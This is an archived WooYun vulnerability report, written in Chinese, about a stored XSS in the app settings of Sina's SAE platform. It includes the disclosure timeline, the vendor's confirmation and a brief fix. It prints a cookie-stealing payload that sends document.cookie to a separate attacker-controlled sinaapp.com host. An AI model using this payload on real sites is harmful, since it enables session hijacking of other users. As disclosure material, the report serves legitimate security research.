漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-044024
漏洞标题:新浪某分站存储型xss漏洞(可指定目标)
相关厂商:新浪
漏洞作者: 大亮
提交时间:2013-11-25 18:02
修复时间:2014-01-09 18:02
公开时间:2014-01-09 18:02
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:18
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-25: 细节已通知厂商并且等待厂商处理中
2013-11-25: 厂商已经确认,细节仅向厂商公开
2013-12-05: 细节向核心白帽子及相关领域专家公开
2013-12-15: 细节向普通白帽子公开
2013-12-25: 细节向实习白帽子公开
2014-01-09: 细节向公众公开
简要描述:
研究xss当中,不惧失败的再次提交下漏洞。
详细说明:
1.厉害的白帽子都有自己的服务器,所以我就选择的去新浪sae网站去看了一下
2.搭建自己的网页应用服务,看见应用设置中的应用描述是个textarea,所以就想试试能不能弹窗,输入代码
看见了弹窗
可是现在弹窗,只能自己看自己的cookie,有没有办法让别人进入这个页面呢
发现代码管理中可以邀请别人,所以我邀请了一位童鞋来当参与者
3.这位童鞋接受了我的邀请
然后问同鞋对这个应用有什么权限,他发来截图
他也有应用设置的权限,让他点下,他那边也弹窗,这应该是个xss漏洞了。
那么我就可以将alert(document.cookie)代码修改一下,
改成发送到我另一个app的代码
</textarea><img src="web2.sinaapp.com?c=<script>document.cookie</script>" width=0 height=0>
这样就可以将cookie值传入另一个app中,这个app当作专门调取别人的cookie来用。
另一个app来接受别人的cookie。
漏洞证明:
修复方案:
过滤字符,对症下药
版权声明:转载请注明来源 大亮@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2013-11-25 19:20
厂商回复:
感谢关注新浪安全,该问题已经确认,由于需要的交互性比较大,影响有限,如有疑问,可直接私信联系!
最新状态:
暂无